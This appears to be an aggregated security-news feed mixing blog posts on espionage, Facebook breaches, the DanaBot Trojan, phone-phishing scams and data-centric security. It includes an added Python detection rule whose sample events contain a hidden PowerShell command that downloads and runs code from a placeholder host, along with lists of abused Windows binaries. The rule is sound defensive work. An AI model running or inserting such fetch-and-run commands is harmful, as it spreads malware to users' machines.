Agrawal headed hydraulics, pneumatics and warhead integration and had recently received a Young Scientist Award. He had been working in Nagpur for the past year. The ATS found confidential, defence-related information on his laptop. Despite lengthy questioning, he could not explain the presence of such sensitive material on his device.

The sharing of information had reportedly been going on for two years. Given his position, Agrawal was well placed to provide inside information on the latest technology developed jointly by India and Russia. The data was shared not only with the ISI but reached other foreign countries as well. The "information" in question concerns seeker technology, which determines a missile's accuracy.


The most ingenious part of the scheme is that Agrawal allegedly passed the sensitive information to his handlers disguised as a "coded game". According to the ATS, once the game's code is decoded there is a fair chance that the hidden information can be recovered.



E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: The MSP Guide to Building Your Managed Security Services: Best Practices for Marketing | Avast Business

There’s an ever-growing need for digital protection in today’s world, and, when delivered the right way, managed security services can provide this security while paving the road to success for any MSP. In our blog series centered around The MSP Guide to Building Your Managed Security Services, we discussed the smartest and most advantageous ways to define and bundle MSP services in Part 1 and key pricing strategies in Part 2. In our third and final post, we’re touching on MSP best practices for marketing success.



Blog | Avast EN

Blog | Avast EN: Avast pumps protection, performance, and privacy in 2019 | Avast

The tech world evolves. The ones who wear black hats get smarter, and the ones who wear white hats get even smarter. Using AI, machine learning, and the big data of our vast network, we’re proud to be forerunners in the latter category, staying a step ahead of the cybercrime underworld. We not only test our products rigorously in our own labs, but we submit them for objective third-party evaluations to learn where we can improve. Reviews have been favorable throughout 2018 and we continue to offer the best free and most competitive and feature rich antivirus products on the market.

Avast Free Antivirus 2018 for Windows received the Top Product award from AV-Test. The Avast 2019 product line-up adds more features.




Data Security Blog | Thales eSecurity: A new era for customer data – could security be ‘the new green’ for businesses?

There was a tipping point not so long ago in the realm of environmental responsibility for businesses. For some time, curbing emissions and waste was simply something the corporate world did if it had to, in order to comply with governmental regulations and avoid a hefty fine. Now, driven by a few ‘leading-edge’ companies who chose to take the plunge, being ‘lean and green’ is widely agreed to improve profitability and enhance competitiveness.

I now see cyber security – and more specifically, data security – positioned at the edge of a similar tipping point. Driven by the introduction of the General Data Protection Regulation (GDPR) and heightened by constantly evolving demands, consumers are changing their purchasing habits. With this only set to continue, there is every chance we may soon see organisations using data security to seize a competitive advantage.

GDPR: to help or hinder?

In the run up to its implementation earlier this year, the GDPR scare stories came thick and fast, with the majority of exposure playing on fears of enormous financial penalties or reputation-destroying data breaches.

While some businesses have undoubtedly been more cautious of the impact of their irresponsible data practices than others have, the regulation has arguably created a damaging approach to security. Many organisations recognise data security as something that can’t be ignored, but still invest in it sparingly and reluctantly.

While it’s not difficult to understand the psychology at play here – it’s hard for any of us to get excited about spending money when we feel we are forced to do so – that doesn’t make it any less of a priority. Think TV licenses and car insurance, for example.

However, the narrative is set to change. There has never been more public awareness around the importance of data security – between the Cambridge Analytica scandal and hundreds of GDPR ‘opt-out’ notifications – the topic has been on our front pages and at the top of our inboxes for a while.

Indeed, data and information security has truly emerged into the public’s collective consciousness as we’ve seen in recent examples such as the reporting on cyber hacking group, Fancy Bear, where the group had tried to steal data from political organisations, including the International Republican Institute and the Hudson Institute think tanks.

A personal interest

Cybersecurity and personal data security has now become so important it’s gone from something consumers simply know about, to something consumers actually care about.

What’s more, we’re increasingly seeing evidence that consumer buying habits are directly influenced by how closely a company will safeguard their personal data. In fact, Gartner recently predicted that by 2021, organisations that protect their customers’ privacy will generate 20 per cent more revenue than those who don’t. So, similarly to environmental issues, data security is shifting from a box-ticking exercise to something that demonstrably drives sales.

IBM has gone even further, with its consumer survey revealing that 75 per cent will not buy from a company – no matter how great the products are – if they don’t trust the company to protect their data. It’s intriguing to see which companies will be the first to truly flip the message to customers. As mentioned earlier, corporations could even harness positive data security practices to seize a competitive edge in the market.

On a business-to-consumer level, we’ve already observed retailers using GDPR as an opportunity for innovation and further customer engagement. In an article for Data IQ, David Reed correctly explained, “GDPR is the perfect opportunity for businesses to rethink their approach to data and the enhanced customer relationships and experiences it allows.” Brands that have used GDPR as an opportunity to innovate are now benefiting from stronger relationships with their customers, who are more engaged with their marketing programmes as a direct result.

Ethical incentives

Similarly to the recent war on plastic – which was catapulted into the public view thanks to documentaries by Sir David Attenborough – it could be possible for responsible data use and storage to become mainstream. Arguably, responsible cybersecurity practices could become part of wider marketing plans for companies, especially as we see demographics like millennials who are broadly looking for opportunities to do good in the world, not just financially.

According to not-for-profit consultancy Ethical Consumer, the ethical products and services sector has grown by more than £40bn since 2008, with households spending an average of £1,263 on ethical goods last year. And, what’s to say that in the wake of Cambridge Analytica and other significant data breaches from this year, there isn’t a gap in the market for ethical data marketing? Indeed, there could be an opportunity for driving revenue, trust and engagement with customers, akin to the recommended ban on single-use plastics.

Indeed, the plastics initiative is part of a wider green objective that businesses have harnessed, and as we found with ‘green business’, it only takes one or two trailblazers to revolutionise the course of an entire industry. The same will soon be said about data security, with evolving regulations and industry competition encouraging organisations to think differently about data best practice or risk lagging behind.

The post A new era for customer data – could security be ‘the new green’ for businesses? appeared first on Data Security Blog | Thales eSecurity.



Data Security Blog | Thales eSecurity

Adobe Product Security Incident Response Team (PSIRT) Blog: Security Bulletins Posted

Adobe has published security bulletins for Adobe Digital Editions (APSB18-27), Adobe Experience Manager (APSB18-36), Adobe Framemaker (APSB18-37) and Adobe Technical Communications Suite (APSB18-38). Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant bulletin.

This posting is provided “AS IS” with no warranties and confers no rights.



Adobe Product Security Incident Response Team (PSIRT) Blog

SolarWinds MSP Blog: Customer Success—Using Your Data to Make Organizational Change

In this series of blogs on developing your customer success program, we’ve looked at how you understand and gather data on churn, how you report on customer losses, and how you find out how your customers really feel about your product through tracking your Net Promoter Score (NPS). To make this a valuable exercise for your company, it’s crucial that you also take this insight and feed it back into the way your organization works—companies that do this can dramatically improve their retention rates.


SolarWinds MSP Blog

SecuriTeam Blogs: SSD Advisory – Firefox Information Leak

Vulnerabilities Summary: A vulnerability where the JavaScript JIT compiler inlines Array.prototype.push with multiple arguments results in the stack pointer being off by 8 bytes after a bailout. This leaks a memory address to the calling function which can be used as part of an exploit inside the sandboxed content process. Vendor Response: “Security vulnerabilities …

SecuriTeam Blogs

The Ethical Hacker Network: Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018

Register Now to Learn Blockchain Hacking Step-by-Step!

Nick Furneaux, forensics trainer, investigator & author of "Investigating Cryptocurrencies" takes you through a journey of code and tools to unpick the movement of illegal funds through the blockchain during this fascinating, FREE EH-Net Live! webinar on Wednesday October 24, 2018 at 1:00 PM US Eastern. Join us live to learn how to win free copies of his book!

The post Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018 appeared first on The Ethical Hacker Network.



The Ethical Hacker Network

Data Security Blog | Thales eSecurity: Data-Centric Security and Big Data

As Cybersecurity continues to be heavily focused on solving the problem of attacks against software vulnerabilities and system access, one potential silver bullet in the data breach equation remains out of the limelight. Enter data-centric security… a set of technologies that lower the value of data through encryption, tokenization, data masking and access control methods. Data-centric security has been around for years but doesn’t receive the same level of media coverage, hype or attention that other security technologies do. Perhaps, it should.

Data-Centric Security and Big Data

When you think about what the average enterprise needs to do to protect against attacks on software vulnerabilities and system access, it is daunting. The sad news is that most companies that have deployed reasonable cybersecurity countermeasures have had an unwanted visitor perusing their systems at some point. It’s not a matter of if your systems will be breached but a matter of when, how and at what cost. So let’s assume from this point forward that there is no way to keep intruders out. Better yet, let’s assume that everyone already on the inside of an organization is a threat to sensitive data within the systems there. It’s called the “Zero-Trust Model” and nothing supports it like data-centric security since the methods used can render data useless if it is ever stolen or removed from the enterprise.

The Big Data Conundrum

To better understand the challenges that today’s enterprises face protecting their data, you need to take a look at what is happening to data on a global scale. While consumers were largely responsible for data growth in prior years, by 2025 worldwide data is expected to increase another tenfold and enterprises will have created 60 percent of it [1].

Big data technologies like Greenplum, Hadoop and Teradata are quickly being adopted to help facilitate the storage and access to all this newly created data. Further driving the adoption of big data technologies are applications like analytics, AI, machine learning and IoT which are all fueling the creation and growth of new data lakes. Adding to the challenge is the inherent “open” nature of big data technologies which use standard IP protocols such as HTTP under the hood and provide no native features for encrypting or obfuscating the data they store. In short, these technologies are vulnerable, especially to insiders who have unfettered, root-level access.

Luckily, data-centric security gives enterprises an effective option for protecting data within a big data environment. Key features of data-centric security include:

  • Transparent Data Encryption – Transparent data encryption provides an excellent path for protecting structured data within certain data stores like Hadoop and unstructured data in files. Transparent encryption can typically be implemented without changes to application code or databases, which makes it the quickest path to implementation for most enterprises. Its limit is that it protects data at rest only: anyone the operating system or database authorises to read the file still sees cleartext.
  • Application Layer Encryption or Tokenization – Application layer data security provides the highest level of security, as it is applied high in the software stack and so protects data both in transit and at rest. Application layer data protection typically requires changes to application or database code.
  • Strong Access Controls – By tightly controlling which users may access cryptographic keys or the data behind tokens, it is possible to restrict data access for anyone inside an organization, including root-level administrators. This is essential for supporting the Zero-Trust Model mentioned earlier.
  • Strong Encryption Key Management – Any worthy data security solution using cryptography should include strong key management and a separation of duties between the systems applying data protection and those performing key management. Good key management systems also provide the ability to use a hardware-based root of trust for key creation and storage.

If you are part of an enterprise that is in the process of implementing big data technologies or if your enterprise already has mature big data environments, you should consider deploying a data-centric security solution. Effective data-centric security solutions are the only reasonable path to realizing a Zero-Trust Model. Without a method of obfuscating sensitive data within ever-growing data stores and keeping unfettered access out of the hands of insiders, the data breach problem will continue to grow, unchecked.
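The separation of duties argued for above, with tokenization at the application layer and detokenization gated on role so that a root-level administrator of the data store sees nothing useful, is easier to reason about with a concrete sketch. The following is an added example and is not Thales code or any product's API; the vault, the role names (`fraud_analyst`, `hadoop_admin`), the record layout and the sample card numbers (standard test numbers) are all assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets


class TokenVault:
    """Tokenization service holding the only mapping from tokens back to values.

    Separation of duties: the vault owns the index key and the token mapping;
    the data platform that stores the tokens never sees either. Detokenization
    is gated on the caller's role, so a root-level administrator of the data
    lake, or anyone who exfiltrates it, gets tokens and nothing else.
    (Hypothetical design for illustration, not a vendor API.)
    """

    def __init__(self, index_key: bytes, detokenize_roles):
        self._index_key = index_key            # never leaves the vault
        self._value_by_token = {}              # token -> cleartext
        self._token_by_index = {}              # HMAC(value) -> token
        self._allowed_roles = frozenset(detokenize_roles)

    def _index(self, value: str) -> str:
        # Keyed hash, not a plain hash: an attacker who dumps the index cannot
        # brute-force low-entropy values such as card numbers without the key.
        return hmac.new(self._index_key, value.encode(), hashlib.sha256).hexdigest()

    def tokenize(self, value: str) -> str:
        """Return the token for value, minting a random one on first sight.

        Deterministic per value so equal values get equal tokens, which keeps
        joins and counts working in the data lake without revealing the value.
        """
        idx = self._index(value)
        token = self._token_by_index.get(idx)
        if token is None:
            token = "tok_" + secrets.token_hex(16)  # random; carries no information about value
            self._token_by_index[idx] = token
            self._value_by_token[token] = value
        return token

    def detokenize(self, token: str, role: str) -> str:
        """Reverse a token; only roles on the allow-list may do so."""
        if role not in self._allowed_roles:
            raise PermissionError(f"role {role!r} is not permitted to detokenize")
        return self._value_by_token[token]


def ingest(vault: TokenVault, records):
    """Application-layer protection: the card number is replaced by a token
    before the record is written to the data store."""
    return [{**rec, "card": vault.tokenize(rec["card"])} for rec in records]


def cleartext_exposed(stored_records, sensitive_values) -> bool:
    """What an insider dumping the data store would recover: True if any
    stored card field is still a real value."""
    return any(rec["card"] in sensitive_values for rec in stored_records)


# Constructed sample input; the card numbers are standard test numbers, not real accounts.
RAW_RECORDS = [
    {"txn": 1, "card": "4111111111111111", "amount": 42.10},
    {"txn": 2, "card": "5500000000000004", "amount": 9.99},
    {"txn": 3, "card": "4111111111111111", "amount": 120.00},
]


def demo():
    """Tokenize the sample batch and show what each role can recover."""
    vault = TokenVault(secrets.token_bytes(32), detokenize_roles={"fraud_analyst"})
    lake = ingest(vault, RAW_RECORDS)                   # what the big-data store actually holds
    analyst_view = vault.detokenize(lake[0]["card"], role="fraud_analyst")
    try:
        vault.detokenize(lake[0]["card"], role="hadoop_admin")
        admin_blocked = False
    except PermissionError:
        admin_blocked = True
    return lake, analyst_view, admin_blocked


if __name__ == "__main__":
    lake, analyst_view, admin_blocked = demo()
    print(lake)
    print("analyst recovers:", analyst_view, "| root admin blocked:", admin_blocked)
```

Two design choices deserve a note. Tokens are deterministic per value so that analytics and joins still work on the tokenized lake; the cost is that a token becomes a linkable pseudonym, so the index must be keyed (HMAC) and the key kept with the vault, not the data platform. In production the vault's key would live in a key manager backed by a hardware root of trust, as the last bullet above recommends, and the in-memory dictionaries would be a separately administered database.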

To learn more, visit our website or see us next week, October 14-19, at Teradata Analytics Universe, booth 105 in Las Vegas.

  1. “The value of data: forecast to grow 10-fold by 2025” – Information Age, April 5, 2017

The post Data-Centric Security and Big Data appeared first on Data Security Blog | Thales eSecurity.




E Hacking News – Latest Hacker News and IT Security News: Cloned Profile Hoax on Facebook makes a comeback


A hoax is doing the rounds in which the sender claims to have received another friend request from the recipient; Facebook officials have confirmed that the claim of accounts being cloned is a hoax intended to fool users.


The hoax, which went viral on Sunday, is built around a duplicate-friend-request message that asks the receiver to forward it to their friends.
 

The message, which has troubled so many Facebook users that reports of it have surged lately, reads: "Hi I actually got another friend request from you yesterday...which I ignored so you may want to check your account.

'Hold your finger on the message until the forward button appears...then hit forward and all the people you want to forward too...I had to do the people individually. Good Luck!'


Officials of the social media giant said there is no evidence of any virus linked to the scam messages or to their spread; the message appears to be driven by fear alone.


It takes the form of a "chain mail" type notice. A spokesperson said, 'We've heard that some people are seeing posts or messages about accounts being cloned on Facebook.' He added, 'We haven't seen an increase in incoming reports of impersonation (cloned accounts).'


A cloning scam is when someone creates an alternative profile of a user using pictures and data copied from the victim's original profile. This kind of identity attack does not require access to the victim's account. The criminal then sends friend requests to the victim's existing friends in a calculated attempt to harvest more personal data.


To check, users can search their own name on Facebook; if accounts other than the original appear in the results with a similar display name and details, the account has probably been cloned.


Such cases should be reported to Facebook immediately with a request to remove the duplicate account, which is said to be handled within 24 hours.

News Tom’s Guide: Alexa App Just Got A Big Overhaul

Amazon's Alexa app has looked the same for a long time. But on Friday, Amazon announced that its voice assistant is getting a makeover. The app, which previously wore a utilitarian black, dark blue, and white interface, has integrated more colors, inclu

News Tom's Guide

E Hacking News – Latest Hacker News and IT Security News: DanaBot Trojan: Another Banking Malware

DanaBot Trojan: Another Banking Malware


Having already wreaked havoc in Australia and Europe, the DanaBot Trojan has now spread to customers of banks in the United States.


Initially this banking Trojan was restricted to a few parts of the world. The modular Trojan, written in Delphi, attempts to harvest account information and credentials from online banking sites.

It does so by several means, including taking screenshots while the screen is active and logging keystrokes on the device. The harvested data is collected and sent to a central command-and-control server.

A single group was behind DanaBot when it first surfaced, with Australian banks the main prey. Over time more actors joined in, and the latest campaigns are being run under different affiliate IDs.

According to sources, DanaBot is likely marketed as part of a larger affiliate system, in which operators either rent the Trojan from the developer or share profits with them.

One campaign identified in North America was spreading through malspam (malicious spam) that mimics a digital fax notification from eFax, telling the recipient to click to download the fax.

Once downloaded, a malicious Word document opens and prompts the user to press the “Enable Content” button. Clicking it runs the Word macros, which immediately download and install Hancitor on the victim's device. Hancitor then downloads DanaBot and other malware onto the computer.
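The infection chain above (Word macro, then a downloader, then the banking Trojan) leaves a reliable trace in endpoint telemetry: an Office process spawning a script host or living-off-the-land binary, often with a URL or a %TEMP% path on the command line. The following detection rule is an added example written for this article, not code from any vendor or from the researchers cited; the event records are constructed, loosely modelled on Sysmon process-creation field names, and the lists of Office parents and suspicious children are assumptions to be tuned per environment.

```python
import re

# Constructed sample process-creation events (not real telemetry), loosely
# modelled on Sysmon Event ID 1 fields. Event 1 is the macro-dropper chain the
# article describes; events 2 and 3 are benign look-alikes; event 4 is an
# Excel-spawned DLL load from %TEMP%.
SAMPLE_EVENTS = [
    {"ts": "2018-10-12T14:03:11Z", "host": "ws-17",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/efax'))"},
    {"ts": "2018-10-12T14:03:30Z", "host": "ws-17",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},             # print helper, normal for Word
    {"ts": "2018-10-12T14:05:02Z", "host": "ws-22",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},   # user-launched, not Office
    {"ts": "2018-10-12T14:09:45Z", "host": "ws-31",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\jsmith\AppData\Local\Temp\6.dll,f1"},
]

# Hypothetical lists; tune to the environment. Office parents on the left,
# script hosts and LOLBins that a macro typically hands off to on the right.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                       "bitsadmin.exe", "msiexec.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return an alert dict if the event matches the macro-dropper pattern, else None."""
    parent = basename(event["ParentImage"])
    if parent not in OFFICE_APPS:
        return None                                   # rule only cares about Office parents
    child = basename(event["Image"])
    cmdline = event.get("CommandLine", "")
    reasons = []
    if child in SUSPICIOUS_CHILDREN:
        reasons.append(f"{parent} spawned {child}")
    if URL_RE.search(cmdline):
        reasons.append("command line contains a URL (possible stager download)")
    if TEMP_RE.search(cmdline):
        reasons.append("command line references a payload under %TEMP%")
    if not reasons:
        return None
    return {"ts": event["ts"], "host": event["host"], "parent": parent,
            "child": child, "reasons": reasons}


def detect(events):
    """Run the rule over a batch of events and return the alerts in order."""
    return [alert for alert in map(score_event, events) if alert is not None]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["ts"], alert["host"], alert["parent"], "->", alert["child"],
              "|", "; ".join(alert["reasons"]))
```

Run on the constructed batch, the rule fires twice (the Word-to-cmd-to-PowerShell download and the Excel-to-rundll32 load from %TEMP%) and stays quiet on Word's print helper and on a user-launched PowerShell script. The parent-process check is what keeps the false-positive rate low; a bare "PowerShell with a URL" rule would page on every admin script.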

Security researchers in the US say that TD Bank, J.P. Morgan Chase and Bank of America are among the banks whose customers have been the primary targets of this DanaBot campaign.

There are currently nine separate distributors of the Trojan, each identifiable by its affiliate ID.

Most of the time a single distributor targets a specific region. Australia has been targeted by two distinct affiliate IDs, each using its own delivery methods, including installation via the Hancitor malware and web injects.

DanaBot's command-and-control behaviour closely resembles that of a well-known ransomware family, which has led to speculation that DanaBot is itself a next-generation ransomware.

One source suggested that this banking Trojan, intent on harvesting users' bank details, may be an evolved version of the infamous CryptXXX ransomware.

E Hacking News – Latest Hacker News and IT Security News: Phone Phishing Level Ups: Smart Slaves to Digital Wizardry


Our affinity for technology has convinced many of us that we are too smart to fall for scams and novel cyber attacks; what escapes our notice is that over-reliance on technology has its own costs. When people still fall for an old-fashioned telephone phishing scam, the inference is that we have become smart slaves to digital wizardry, and scam artists keep finding new ways to exploit that.

Matt Haughey, creator of the weblog MetaFilter and a writer at Slack, has given an account of receiving a call from an 800 number that resembled the number his credit union uses. Since his credit union rarely calls, he picked up the last of three successive calls. A woman on the line explained that the credit union had blocked two phony-looking charges in Ohio made to his ATM card. She read him the last four digits of his card and, needless to say, they checked out.

Haughey replied that he would need a replacement card urgently, as he had a trip to California planned. The caller immediately said he could keep his card, and any future charges not made in Oregon or California would simply be blocked by the credit union.

Haughey sensed something was off: the bank had just called to say his card was being frozen and then spontaneously offered to keep it open for his trip. He reassured himself that the caller was simply doing him a favour.

Battling his suspicion, he hesitantly cooperated as the caller verified his home address and mother's maiden name, ostensibly so that a new card could be sent once the California trip was over.

Once those details were confirmed, the caller asked him to verify the three-digit security code on the card; since he had given out this code before when paying with the card, he let his guard down.

She then asked for the PIN of his current card, explaining that the same PIN would be applied to the new one. The question alarmed Haughey and he asked her to repeat it. When she did, he provided the PIN, though sceptically.

After hanging up, Haughey was largely convinced the call had been legitimate, but the request for his PIN kept him uneasy.

In an interview with KrebsOnSecurity, Haughey said, “I balked at challenging her because everything lined up.” He added, “But when I hung up the phone and told a friend about it, he was like, ‘Oh man, you just got scammed, there’s no way that’s real.'”

Increasingly worried, Haughey went to his credit union to make sure his travel arrangements were in order. He recounted the incident to a bank employee whose expression alone confirmed his friend's verdict.

A review of his account showed two fraudulent charges totalling $3,400, and Ohio had nothing to do with it: over $2,900 had been spent at a Kroger near Atlanta and $500 withdrawn from an ATM in the same area using a counterfeit debit card.

Putting the fake professionalism and realism of it all into perspective, Haughey said, “People I’ve talked to about this say there’s no way they’d fall for that, but when someone from a trustworthy number calls, says they’re from your small town bank, and sounds incredibly professional, you’d fall for it, too.”

Narrow escape

Cabel Sasser, founder of Panic Inc., recently gave an account of how he nearly fell prey to a telephone scam from a number matching the one printed on the back of his Wells Fargo card.

“I answered, and a Fraud Department agent said my ATM card has just been used at a Target in Minnesota, was I on vacation?” Sasser tweeted.

Sasser’s tweet did not mention that his corporate debit card had already been hit by two fraudulent charges; after he disputed them, his bank had mailed him a replacement card.

Recalling in an interview with KrebsOnSecurity, Sasser said “I used the new card at maybe four places and immediately another fraud charge popped up for like $20,000 in custom bathtubs,” He added, “The morning this scam call came in I was spending time trying to figure out who might have lost our card data and was already in that frame of mind when I got the call about fraud on my card.”
The card-replacement routine then began. The caller asked, “Is the card in your possession?” It was. The caller then asked for the CVV, the three-digit code printed on the back of the card.

Once the CVV was verified, the agent offered to expedite a replacement. Sasser recalled: “First he had to read some disclosures. Then he asked me to key in a new PIN. I picked a random PIN and entered it. Verified it again. Then he asked me to key in my current PIN.”

It then dawned on Sasser that a real representative from Wells Fargo’s fraud division would already have his current PIN.

The caller feigned authenticity by assuring him that it was only to confirm the change and that he could not see what was being entered.

Sasser countered that they were the bank, they had his PIN, and they could see what he entered. The caller retorted, “Only the IVR [interactive voice response] system can see it.” The caller then read back Sasser’s Social Security number and asked him to confirm it.

The number was correct, but the call still did not feel authentic. Sasser told the agent he would hang up and call back. When he dialled the number printed on the back of his card, the same number the call had appeared to come from, the person who answered said no fraud had been detected on his account.

“I was just four key presses away from having all my cash drained by someone at an ATM,” Sasser told the interviewer. A visit to his local branch confirmed his fears. “The Wells person was super surprised that I bailed out when I did and said most people are 100 percent taken by this scam,” Sasser said.

Mortal, computer or a fusion?

“Vishing” (voice phishing) may use a live caller, an automated voice, or a combination of the two. Although the scammer was an actual person in the cases above, automated and hybrid attempts are equally prevalent. The August case of “Curt”, as reported by KrebsOnSecurity, is a defining example.

Referenced from Curt’s writings, “I’m both a TD customer and Rogers’s phone subscriber and just experienced what I consider a very convincing and/or elaborate social engineering/vishing attempt,”

“At 7:46pm I received a call from (647-475-1636) purporting to be from Credit Alert (alertservice.ca) on behalf of TD Canada Trust offering me a free 30-day trial for a credit monitoring service.”

The caller reportedly introduced herself as ‘Jen Hansen’ and proceeded with what Curt described as “over-the-top courtesy.”

“It sounded like a very well-scripted Customer Service call, where they seem to be trying so hard to please that it seems disingenuous,” Curt recollected. “But honestly it still sounded very much like a real person, not like a text to speech voice which sounds robotic. This sounded VERY natural.”
The caller then told Curt that TD Bank was offering a free month of credit monitoring, which he could cancel at any time, and that all he had to do to apply was confirm his home mailing address.

The woman on the line went on to describe the package, and as she was praising the free antivirus and anti-keylogging software it included, Curt interrupted to ask what the weather was like where she was. The off-script question baffled her (a robot); after a couple of apologies she transferred the call to another line, where the question was again ignored and the new voice simply carried on explaining the service.

Having thrown the robots off script with his questioning, Curt hung up and immediately contacted TD Bank, which assured him that he had dodged a bullet: no one at the bank had called him.

Preventive front

To guard against phone phishing, never disclose identity or banking information to an unsolicited caller. As with email scams, urgency is central: haste short-circuits the reasoning that would otherwise add things up, and that is exactly what the scammer relies on to keep the target from mounting a defence.

If a call leaves you worried about your finances, do not seek help on a number the caller gave you, and do not trust the number shown on caller ID, which can be spoofed to match the one printed on your card; hang up and call the bank yourself using the number on the back of your card. Don't hesitate to end a call that turns into an interrogation within seconds; deliberate attempts to probe into your personal details should be treated as a warning sign, and a bit more alertness than usual is warranted in these times.


liquid thoughts: Still Hope

As I sit here in our new home with my beautiful baby boy Edgar napping and my wonderful wife Emily working around the house, I am trying hard to put together another article describing why and how this text stuff needs to happen. I think there is still hope, Doug.

I really hope Edgar will grow up with more powerful intellectual tools.

The article I am working on is called “In This Information War, Arm The Citizenry”. No link yet.




liquid thoughts

liquid thoughts: Compressed Scrolling

When we scroll through a textual document on a computer system, the body of the text quickly accelerates into an illegible blur, with headings not far behind in losing their legibility and thus their utility.

I am a gamer, particularly interested in the Battlefield franchise, which is not only spectacular to look at but also has a very well developed sense of movement and weapon and equipment manipulation: https://www.youtube.com/watch?v=UZW4cPUIVf4

I have experimented with gestures for a while, including gestures to pinch documents (using your trackpad or your iPad) to collapse/compress the document so that body text disappears and you have a table of contents/outline instantly.

However, what about changing the view based on whether you are still or scrolling, giving a smooth operation into something quite different, like a modern computer game might accomplish? The point here is to ask WHY the user is scrolling, not to simply copy the analog scroll from Egyptian times.

The user is scrolling because she wants to look at another part of the document, which is why Doug Engelbart called this navigation rather than simple scrolling (I expect). So the idea here, which I feel we should put resources into investigating, would be to change the document on scrolling: maybe move the headings closer together and make the body smaller and greyer, apart from any names (or other custom requirements, such as instantly replacing company names with logos on scrolling), so that the user flips into a navigation/overview mode when scrolling, rather than simply shuffling a paper replica.

To find out if this is indeed useful or just a fancy demo would require a very flexible and capable graphics system to experiment on. I think this is crucial work.

I want this guy to have the best reading and authoring experience when he grows up (side note: this picture was taken on a smartphone (iPhone XS Max), and I therefore think our text environments have a lot more power to offer. Let’s explore…):




E Hacking News – Latest Hacker News and IT Security News: Facebook Admits Using Users’ 2FA Phone Number for ad targeting


The phone number that users enter on Facebook for 2FA (two-factor authentication) is being used to target them with ads. 2FA, as the name suggests, adds a second layer of security to strengthen authentication.
In the wake of a Gizmodo report based on a study by researchers at two American universities, Facebook admitted that it repurposed phone numbers entered on the platform for 2FA to target advertising. The study describes phone numbers provided for security reasons as potential fodder for advertisers.
When asked about the findings, a Facebook spokesperson told TechCrunch: "We use the information people provide to offer a better, more personalized experience on Facebook, including ads." He added, "We are clear about how we use the information we collect, including the contact information that people upload or add to their own accounts."
The claims made by the study prompted the social media giant to respond, and it acknowledged channelling data intended for security purposes into advertising.
Users who have uploaded contact lists to Facebook are also unwittingly helping advertisers obtain the PII (Personally Identifying Information) of their contacts.
On the prevention front

Facebook clarified that users can choose not to be targeted this way by selecting a form of 2FA that is not based on a mobile number and by undoing the contact synchronization that uploaded their contacts.

Referencing a spokesperson’s statement, users can manage and delete the contact information they’ve uploaded on the platform at any time.





E Hacking News – Latest Hacker News and IT Security News: Facebook data breach affects 50 Million users



Around 50 million of its users were put at risk by a security flaw, according to Facebook.

As usual, the aim of the breach was to take over users’ accounts. It was the result of attackers exploiting a vulnerability in the “View As” feature. The breach was discovered on Tuesday, and the social-media giant immediately informed law enforcement.

The “View As” privacy function helps a user to see what their profile looks like to other users, especially what information is open to their friends, friends of friends and public. “Access Tokens” are equivalent to digital keys which help the users to stay logged into their accounts.

A combination of bugs in the feature gave the attackers a way to steal access tokens and get into people’s accounts.

The social-networking site’s vice-president of product management said that the fault has been corrected and that all affected plus some other accounts too are being reset to ensure further safeguarding. Also, the possibly affected users were urged to re-login on Friday, without any need to change passwords.

With over 2 billion monthly active users, Facebook suffered a further blow when its share price fell by more than 3%.
The breach could also let attackers into accounts on other sites where people log in with Facebook, including Tinder and Airbnb, to name a few.

The investigation has only just begun, so which parts of the world those 50 million users come from is not yet known. Whether the accounts were misused and the information compromised is also still an open question.

Mark Zuckerberg, the founder, and Sheryl Sandberg, the chief operating officer of the platform, were among those 50 million victims. The culprit behind the attack remains unknown.

It is getting harder by the day for Facebook to persuade statesmen and legislators that it can protect its users’ data, and with the growing number of cyber-crimes related to the platform, users’ trust is wavering.

Facebook urgently needs to take such breaches seriously, tackle them forcefully and prepare plans for further attacks that could compromise the vast amounts of data it holds.

The only way to ensure user privacy is to limit access points and rework features so that they operate in line with data safety.

According to sources, attackers are drawn to vulnerabilities, and that is how Facebook became a target of cyber-crime. People’s privacy and security are of utmost importance, and that should not change.



E Hacking News – Latest Hacker News and IT Security News: Hide and Seek IoT Botnet Increasing Infection Capabilities with New Vectors



The Hide and Seek IoT botnet has been updated to target Android devices, and the criminal group behind its development has been seen adding new functionality in recurring incremental optimizations to the core engine.

The Android infections do not appear to rely on specific vulnerabilities; instead they abuse the Android Debug Bridge (ADB) option. By default this is turned off, but users sometimes need to turn it on.

The IoT botnet has been observed adding around 40,000 devices to its ranks; the infected devices are mostly in China, Korea and Taiwan. Many Android devices are now part of home infrastructure (phones, tablets, televisions and various peripherals), which is why attacks exploiting them are regarded as critical.

Its samples focus on devices that have the ADB option enabled, either by default or by the users themselves. When this capability is enabled the device is exposed, because it opens a network port that accepts remote connections. The malicious operators have been seen performing unauthenticated login attempts, using either default passwords or brute force against the devices.

